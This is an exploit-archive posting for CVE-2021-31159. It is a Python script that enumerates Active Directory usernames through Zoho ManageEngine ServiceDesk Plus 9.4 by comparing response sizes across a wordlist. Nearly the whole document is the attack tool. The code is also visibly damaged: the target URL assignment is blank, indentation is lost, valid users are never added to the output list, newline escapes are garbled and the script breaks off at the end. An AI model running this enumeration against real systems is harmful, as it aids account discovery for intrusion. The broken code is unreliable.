Authored by Ricardo Jose Ruiz Fernandez

Zoho ManageEngine ServiceDesk Plus version 9.4 suffers from a user enumeration vulnerability.

advisories | CVE-2021-31159

# Exploit Title: Zoho ManageEngine ServiceDesk Plus MSP - Active Directory User Enumeration (CVE-2021-31159)
# Date: 17/06/2021
# Exploit Author: Ricardo Ruiz (@ricardojoserf)
# CVE: CVE-2021-31159 (
# Vendor Homepage:
# Vendor Confirmation:
# Version: Previous to build 10519
# Tested on: Zoho ManageEngine ServiceDesk Plus 9.4
# Example: python3 -t -d DOMAIN -u USERSFILE [-o OUTPUTFILE]
# Repository (for updates and fixing bugs):

import argparse
import requests
import urllib3

def get_args():
parser = argparse.ArgumentParser()
parser.add_argument('-d', '--domain', required=True, action='store', help='Domain to attack')
parser.add_argument('-t', '--target', required=True, action='store', help='Target Url to attack')
parser.add_argument('-u', '--usersfile', required=True, action='store', help='Users file')
parser.add_argument('-o', '--outputfile', required=False, default="listed_users.txt", action='store', help='Output file')
my_args = parser.parse_args()
return my_args

def main():
args = get_args()
url =
domain = args.domain
usersfile = args.usersfile
outputfile = args.outputfile

s = requests.session()
resp_incorrect = s.get(url+"/"+"nonexistentuserforsure"+"&dname="+domain, verify = False)
incorrect_size = len(resp_incorrect.content)
print("Incorrect size: %s"%(incorrect_size))

correct_users = []
users = open(usersfile).read().splitlines()
for u in users:
resp = s.get(url+"/"+u+"&dname="+domain, verify = False)
valid = (len(resp.content) != incorrect_size)
if valid:
print("User: %s Response size: %s (correct: %s)"%(u, len(resp.content),str(valid)))

print("nCorrect usersn")
with open(outputfile, 'w') as f:
for user in correct_users:
f.write("%sn" % user)
print("- %s"%(user))

print("nResults stored in %sn"%(outputfile))

if __name__ == "__main__":